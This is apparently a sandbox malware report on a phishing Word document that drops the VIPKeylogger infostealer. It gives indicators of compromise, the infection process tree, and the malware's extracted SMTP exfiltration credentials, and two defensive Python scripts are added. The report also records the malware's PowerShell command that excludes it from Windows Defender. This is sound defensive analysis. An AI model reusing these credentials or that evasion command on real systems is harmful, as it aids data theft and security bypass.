Analysis
- max time kernel: 121s
- max time network: 133s
- platform: windows7_x64
- resource: win7-20241010-en
- resource tags: arch:x64 arch:x86 image:win7-20241010-en locale:en-us os:windows7-x64 system
- submitted: 23-10-2024 10:06
Static task: static1
Behavioral task: behavioral1
- Sample: RFQ PO 2.docx
- Resource: win7-20241010-en
Behavioral task: behavioral2
- Sample: RFQ PO 2.docx
- Resource: win10v2004-20241007-en
General
- Target: RFQ PO 2.docx
- Size: 458KB
- MD5: 918f63aeccaa7aeef06d25c031acd858
- SHA1: 7234c8c1a704ee3cb3f9f30f560a02fd0f5ec87c
- SHA256: 2c1e44e7ddf88303822b2a9e7cbfaeedbdbe3ace36ce3e028d19b68cf33c11b3
- SHA512: aa1bbd9609e92b1e5319c28586ef2a3ce105335f457069ea6c3c05ccde8b1d6b008cdac6f6236fde74a64f3e07695a5eb2ce5041101fbdf95c55c1f885fa7f87
- SSDEEP: 6144:zzbUb0cVLNEzYvRSPlaMXKaAi69qltTGSmNZ5m9tmYL6qoPQ7tmYB/l2mDlJjAIJ:NkF5SPMM6I9X4Xs9mrm9Bt2mhW8G0Y8
Malware Config
Extracted
vipkeylogger
- Protocol: smtp
- Host: mail.tonicables.top
- Port: 587
- Username: [email protected]
- Password: 7213575aceACE@@
- Email To: [email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it resembles SnakeKeylogger, which was first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
Processes:
  flow  pid   process
  7     1444  EQNEDT32.EXE
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell to modify Windows Defender settings by adding exclusions for file extensions, paths, or processes.
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE 3 IoCs
Processes:
  pid   process
  2204  obiddjtrh.exe
  2564  obiddjtrh.exe
  2428  obiddjtrh.exe
-
Loads dropped DLL 2 IoCs
Processes:
  pid   process
  1444  EQNEDT32.EXE
  1444  EQNEDT32.EXE
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk, where infostealers often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
  description  ioc  process
  Key opened  \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  obiddjtrh.exe
  Key opened  \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  obiddjtrh.exe
  Key opened  \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  obiddjtrh.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow  ioc
  8     checkip.dyndns.org
-
Drops file in System32 directory 1 IoCs
Processes:
  description  ioc  process
  File opened for modification  C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
  description                           pid   process        target process
  PID 2204 set thread context of 2428   2204  obiddjtrh.exe  obiddjtrh.exe
-
Drops file in Windows directory 1 IoCs
Processes:
  description  ioc  process
  File opened for modification  C:\Windows\Debug\WIA\wiatrace.log  WINWORD.EXE
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description  ioc  process
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  EQNEDT32.EXE
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  obiddjtrh.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  obiddjtrh.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  WINWORD.EXE
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
  pid   process
  1680  WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
  pid   process
  2204  obiddjtrh.exe
  2204  obiddjtrh.exe
  2204  obiddjtrh.exe
  2204  obiddjtrh.exe
  2428  obiddjtrh.exe
  2468  powershell.exe
  2428  obiddjtrh.exe
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
  description               pid   process
  Token: SeDebugPrivilege   2204  obiddjtrh.exe
  Token: SeDebugPrivilege   2428  obiddjtrh.exe
  Token: SeDebugPrivilege   2468  powershell.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
  pid   process
  1680  WINWORD.EXE
  1680  WINWORD.EXE
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
  25 WriteProcessMemory events, grouped by source and target process:
  count  pid   process        target pid  target process
  4      1444  EQNEDT32.EXE   2204        obiddjtrh.exe
  4      2204  obiddjtrh.exe  2468        powershell.exe
  4      2204  obiddjtrh.exe  2564        obiddjtrh.exe
  9      2204  obiddjtrh.exe  2428        obiddjtrh.exe
  4      1680  WINWORD.EXE    2548        splwow64.exe
-
outlook_office_path 1 IoCs
Processes:
  description  ioc  process
  Key opened  \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  obiddjtrh.exe
-
outlook_win_path 1 IoCs
Processes:
  description  ioc  process
  Key opened  \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  obiddjtrh.exe
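The "Abuses OpenXML format to download file from external location" signature above fires because a .docx is a ZIP of XML parts, and a relationship part (word/_rels/settings.xml.rels for an attached template, or document.xml.rels for a linked OLE object) may carry TargetMode="External" with an http(s) target that Word fetches when the document is opened; the 670KB mnobizxv[1].doc under Temporary Internet Files\Content.IE5 in the Downloads list is the WinINet cache copy of what this sample pulled. The Python script below is an added example, not output of the sandbox and not code shipped with the sample: it lists such relationships in any .docx, builds a constructed document in memory for demonstration, and the template URL inside that document is a placeholder rather than the one this sample used (the report does not show it).

```python
"""List external OpenXML relationships in a .docx (remote-template check).

Added example for this report; the sample .docx built below is constructed
and its template URL is a placeholder, not the sample's real target.
"""
from __future__ import annotations

import io
import sys
import xml.etree.ElementTree as ET
import zipfile

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
WML_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def external_relationships(docx_bytes: bytes) -> list[dict[str, str]]:
    """Return every relationship with TargetMode="External", except hyperlinks.

    Word's own parts are internal; an external attachedTemplate, oleObject or
    image relationship makes Word fetch content from the URL on open.
    """
    hits: list[dict[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                if rtype == "hyperlink":  # clickable links are external by design
                    continue
                hits.append({"part": name, "id": rel.get("Id", ""),
                             "type": rtype, "target": rel.get("Target", "")})
    return hits


def _rels_xml(entries) -> str:
    """Serialise (Id, short Type, Target, TargetMode-or-None) tuples as a .rels part."""
    body = "".join(
        f'<Relationship Id="{rid}" Type="{OFFICE_REL}{rtype}" Target="{target}"'
        + (f' TargetMode="{mode}"' if mode else "") + "/>"
        for rid, rtype, target, mode in entries
    )
    return ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            f'<Relationships xmlns="{PKG_REL_NS}">{body}</Relationships>')


def build_sample_docx() -> bytes:
    """Constructed sample: the minimal parts plus an external attachedTemplate."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels",
                    _rels_xml([("rId1", "officeDocument", "word/document.xml", None)]))
        zf.writestr("word/document.xml",
                    f'<?xml version="1.0"?><w:document xmlns:w="{WML_NS}"><w:body/></w:document>')
        zf.writestr("word/_rels/document.xml.rels",
                    _rels_xml([("rId1", "settings", "settings.xml", None)]))
        # settings.xml points at rId1 in its own .rels part; that is where the
        # remote template lives in a template-injection document.
        zf.writestr("word/settings.xml",
                    f'<?xml version="1.0"?><w:settings xmlns:w="{WML_NS}" '
                    f'xmlns:r="{OFFICE_REL[:-1]}"><w:attachedTemplate r:id="rId1"/></w:settings>')
        zf.writestr("word/_rels/settings.xml.rels",
                    _rels_xml([("rId1", "attachedTemplate",
                                "http://template.example/template.doc",  # placeholder URL
                                "External")]))
    return buf.getvalue()


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_docx()
    for hit in external_relationships(data):
        print(f"{hit['part']}: {hit['type']} {hit['id']} -> {hit['target']}")
```

Run it against the real file (python script.py "RFQ PO 2.docx") to recover the actual target; any External relationship other than a hyperlink, and attachedTemplate or oleObject in particular, is worth blocking at the proxy and pivoting on. The check covers relationship parts only: a document can also reach out through field codes in document.xml (DDEAUTO and friends), which this script does not parse.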
Processes
- WINWORD.EXE (PID 1680, level 1)
  image: C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
  command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ PO 2.docx"
  signatures: Drops file in Windows directory; System Location Discovery: System Language Discovery; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - splwow64.exe (PID 2548, level 2)
    image: C:\Windows\splwow64.exe
    command line: C:\Windows\splwow64.exe 12288
- EQNEDT32.EXE (PID 1444, level 1)
  image: C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  signatures: Blocklisted process makes network request; Loads dropped DLL; System Location Discovery: System Language Discovery; Launches Equation Editor; Suspicious use of WriteProcessMemory
  - obiddjtrh.exe (PID 2204, level 2)
    image: C:\Users\Admin\AppData\Roaming\obiddjtrh.exe
    command line: "C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"
    signatures: Executes dropped EXE; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - powershell.exe (PID 2468, level 3)
      image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"
      signatures: Command and Scripting Interpreter: PowerShell; Drops file in System32 directory; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - obiddjtrh.exe (PID 2564, level 3)
      image: C:\Users\Admin\AppData\Roaming\obiddjtrh.exe
      command line: "C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"
      signatures: Executes dropped EXE
    - obiddjtrh.exe (PID 2428, level 3)
      image: C:\Users\Admin\AppData\Roaming\obiddjtrh.exe
      command line: "C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"
      signatures: Executes dropped EXE; Accesses Microsoft Outlook profiles; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; outlook_office_path; outlook_win_path
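Read together, the process tree is the whole chain: Word opens the document and fetches the remote file, Equation Editor starts with -Embedding (that is, activated as a COM server by the DCOM launcher rather than spawned by WINWORD, which is why it appears at level 1 with no Word parent), drops and runs obiddjtrh.exe from %AppData%\Roaming, and that executable adds a Defender exclusion for its own path through PowerShell, then starts two copies of itself, writes into PID 2428 repeatedly and calls SetThreadContext on it, the usual process-hollowing sequence. The Python below is an added example, not part of the sandbox report: it transcribes the recorded processes and runs four triage rules over them. The rule names, the Proc record layout and the list of user-writable directories are this example's own choices.

```python
"""Triage rules over the process tree recorded in this report.

Added example; the records are transcribed from the Processes section above,
the rules and field names are this example's own.
"""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: Optional[int]  # None where the tree shows no parent (DCOM-activated)
    image: str
    cmdline: str


# Transcribed from the report's Processes section.
PROCESSES = [
    Proc(1680, None,
         r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ PO 2.docx"'),
    Proc(2548, 1680, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    Proc(1444, None,
         r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
         r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    Proc(2204, 1444, r"C:\Users\Admin\AppData\Roaming\obiddjtrh.exe",
         r'"C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"'),
    Proc(2468, 2204, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"'),
    Proc(2564, 2204, r"C:\Users\Admin\AppData\Roaming\obiddjtrh.exe",
         r'"C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"'),
    Proc(2428, 2204, r"C:\Users\Admin\AppData\Roaming\obiddjtrh.exe",
         r'"C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"'),
]

# Any Add-/Set-MpPreference call that touches a Defender exclusion list.
EXCLUSION_RE = re.compile(r"(Add|Set)-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)
# Directories a standard user can write to (example's own list).
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\", "\\programdata\\")


def triage(procs: list[Proc]) -> dict[int, set[str]]:
    """Map PID -> set of rule names that fired; PIDs with no findings are absent."""
    by_pid = {p.pid: p for p in procs}
    findings: dict[int, set[str]] = {}

    def flag(pid: int, rule: str) -> None:
        findings.setdefault(pid, set()).add(rule)

    for p in procs:
        parent = by_pid.get(p.ppid) if p.ppid is not None else None
        # Equation Editor renders formulas; it has no reason to start anything.
        if parent and ntpath.basename(parent.image).lower() == "eqnedt32.exe":
            flag(p.pid, "eqnedt32_child")
        if EXCLUSION_RE.search(p.cmdline):
            flag(p.pid, "defender_exclusion")
        if any(m in p.image.lower() for m in USER_WRITABLE):
            flag(p.pid, "user_writable_image")
        # A parent starting a copy of its own image is the hollowing pattern
        # seen here (2204 -> 2564 and 2428, then SetThreadContext on 2428).
        if parent and parent.image.lower() == p.image.lower():
            flag(p.pid, "self_spawn")
    return findings


if __name__ == "__main__":
    for pid, rules in sorted(triage(PROCESSES).items()):
        print(pid, ", ".join(sorted(rules)))
```

Keying the first rule on EQNEDT32.EXE as parent rather than on WINWORD.EXE matters because of the DCOM detail above: a rule written as "WINWORD spawns EQNEDT32" never fires on this tree, while "EQNEDT32 spawns anything" does. The same records can be built from Sysmon Event ID 1 or EDR process telemetry by filling Proc from ProcessId, ParentProcessId, Image and CommandLine.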
Network
MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (T1059): 1
    PowerShell (T1059.001): 1
  Exploitation for Client Execution (T1203): 1
Credential Access
  Credentials from Password Stores (T1555): 1
    Credentials from Web Browsers (T1555.003): 1
  Unsecured Credentials (T1552): 2
    Credentials In Files (T1552.001): 2
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{1247DD2D-3272-4038-A20F-8AE4FFDA0787}.FSD
  Filesize: 128KB
  MD5: 9ced85241b91d1da1a17c5facd482e05
  SHA1: d7a87004beb0710bbe4456046442e40e81dd88a9
  SHA256: 14b06e4e76d50e478b67f0696914f3f76c25db13d34ac7bc3cafb59ddc4c044a
  SHA512: 7020a9cc0269900ad22e02797df8f2f071850b9e8776695c83d3880351b1f8b107dc851a10d4bb4eb26ab949d8d4f6588a33476cfffa4a801cf32adaee7d7e0b
- C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
  Filesize: 128KB
  MD5: bf3f1023b2631463966f355b60846c49
  SHA1: cea9b7988b4e2459bfbc4fe3b18fb7a22f325477
  SHA256: 88efbd7fb48c3e0f6581ef9e78d09650db5315747ec0e3ceee9ea1d5aa717e2b
  SHA512: 0e01d31b8d3640c790376ce2f43da4d4a8df29b1731c479f8ec1b60e35b3e6946039fb9365398c689c81648d06d2c67e035a63041963d1ebcf01095ed8742bf4
- C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{FC6607DB-CD33-4982-B836-620E593AC738}.FSD
  Filesize: 128KB
  MD5: de7cbb3dbb3f3b74235e6c3e9a2f5c18
  SHA1: 9bf4d8215af862e12249fe79138ebe0bed2293da
  SHA256: 52b64b1b1d8034ff878310a482bc79c5d40c22b25e56ac9ecf851464db37926b
  SHA512: 1d1efcdeb5dd3576172c6bfeb6460c44fcd88af31201fffec69a668358684cc221ac9950261a019af82d11754feacddb393baea3194ab7663585c5a0b916ff43
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\mnobizxv[1].doc
  Filesize: 670KB
  MD5: c00a17e56e7eeaf2d72456692c36eec7
  SHA1: 72fbbce62454aaa611317d1c23a1980712d44613
  SHA256: ee1c72ebaf43badfd7469960a19c0b2c54dc7485eff720cab2eb6bb9cf623c04
  SHA512: ba0273b1afeb40e3c877fadc20e3ab3960e4db79272b042e500bc896d3986f607de401a2c300f97c42442e2ce4a03c241913a62439e96ff73b9795ad6527db97
- Filesize: 128KB
  MD5: 695acb97252394349c7b336a95692351
  SHA1: 56d1dad9d474902d19fdcc8e51e554016d12d6fe
  SHA256: 699afb0617d3d5c1bb8ecd6dad0299a3b834285d2097127af30874eaee719518
  SHA512: 381766c3dff8c394ff3c4d36f783dabc6c975719057682415aeca99b340553cd808b55fd31fbb2e61ace39cf2d2cf6129660cc5dc55fabcf989065e6fd2ed56c
- Filesize: 412B
  MD5: 080d84d06e96e51fd365b7fb6cdd073e
  SHA1: 2b07b84b522b8b52b5419ffbe36601b678e5109c
  SHA256: da15367cb302dfa30fb3bd6081060479e86515f2c0e48a0b44098ce7d63beb6b
  SHA512: 77e8bbefc9f8553bf1b1797af60856f32ab499c7e2417a87de5304f987890aab095e306cdd0dfc4a091f78b7a7a76751f3a40e3507c24318561d2e42c6cc89f2
- Filesize: 2B
  MD5: f3b25701fe362ec84616a93a45ce9998
  SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
  SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
  SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
- Filesize: 759KB
  MD5: 7578316e563e8a4a2983ae041a5fff39
  SHA1: fa5a6777784f272b191803d03a49dfe40354bcf2
  SHA256: 2b845ff4c5ee973861ccb905e73fed0bbd46ce5e311fc8910d188ec839226f58
  SHA512: 225fa056dff9c59915fbfe593d3d336c133eeab6be80f48de976f8d14cd773bde21716f489b45c007310da6eb61c9bd6681a7ec0a80559b246af07a1346dc9ba